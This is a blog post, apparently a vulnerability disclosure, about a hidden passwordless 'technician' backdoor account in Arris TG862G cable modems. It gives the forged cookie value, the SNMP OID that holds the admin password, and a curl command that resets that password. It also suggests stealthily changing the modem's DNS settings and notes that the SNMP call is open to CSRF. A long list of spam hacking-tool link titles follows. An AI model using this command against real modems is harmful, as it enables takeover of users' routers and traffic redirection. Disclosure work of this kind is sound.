Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related news

1. Hacking Tools For Kali Linux
2. Pentest Tools Alternative
3. Hacking Tools Software
4. Hack Tools Online
5. Hacker Hardware Tools
6. Pentest Tools Open Source
7. Hacking Tools Usb
8. Pentest Tools Nmap
9. Pentest Tools Download
10. Pentest Reporting Tools
11. Hacking Tools Windows
12. Black Hat Hacker Tools
13. Hak5 Tools
14. Hacker Tools Apk Download
15. Pentest Tools List
16. Hacking Tools For Mac
17. Top Pentest Tools
18. Physical Pentest Tools
19. Hacking Tools Download
20. Best Hacking Tools 2019
21. Pentest Tools Github
22. Hack Tools
23. Hacker Hardware Tools
24. Pentest Tools Find Subdomains
25. Hacker Tools Apk
26. Hack Tools For Ubuntu
27. Hacker Tools Linux
28. Hacking Tools Usb
29. Github Hacking Tools
30. Hacker Tools 2019
31. Hacking Tools Hardware
32. Easy Hack Tools
33. Hacker Tools Online
34. Hack Tools Github
35. Hacking Tools And Software
36. Hack Apps
37. Pentest Tools For Android
38. Pentest Tools Windows
39. Pentest Tools Website Vulnerability
40. Underground Hacker Sites
41. Hack Tools For Pc
42. Hackers Toolbox
43. Pentest Tools For Android
44. Best Hacking Tools 2019
45. How To Make Hacking Tools
46. Hack Tools For Ubuntu
47. Free Pentest Tools For Windows
48. Hack Tools For Games
49. Hack Tools Github
50. Pentest Tools Bluekeep
51. Hack Tools
52. Hack Tools Github
53. Hacker Tools Software
54. Pentest Tools Apk
55. Game Hacking
56. Hacking App
57. Hacker Tools Apk Download
58. Hacker Tools Windows
59. Hack Tools Mac
60. Hacking Tools For Beginners
61. Blackhat Hacker Tools
62. Hacker Tools Hardware
63. Hacker Tools Apk
64. Hacker Tools Software
65. Hacker
66. Pentest Tools Website Vulnerability
67. Best Hacking Tools 2020
68. Hacking Tools For Games
69. Hacker Tools Apk Download
70. Hacking Tools For Games
71. Hacker Tools For Ios
72. Hacker
73. Pentest Tools Tcp Port Scanner
74. Pentest Tools Tcp Port Scanner
75. Pentest Tools Website Vulnerability
76. Kik Hack Tools
77. Hacking Tools Windows 10
78. Pentest Tools Windows
79. Hacking Tools And Software
80. Hacker Tools
81. Pentest Tools Kali Linux
82. Hacking Tools Free Download
83. Hacker Search Tools
84. Hacking Apps
85. Hacking Tools
86. Hacker
87. Pentest Tools Review
88. Pentest Tools Bluekeep
89. How To Install Pentest Tools In Ubuntu
90. Pentest Tools Windows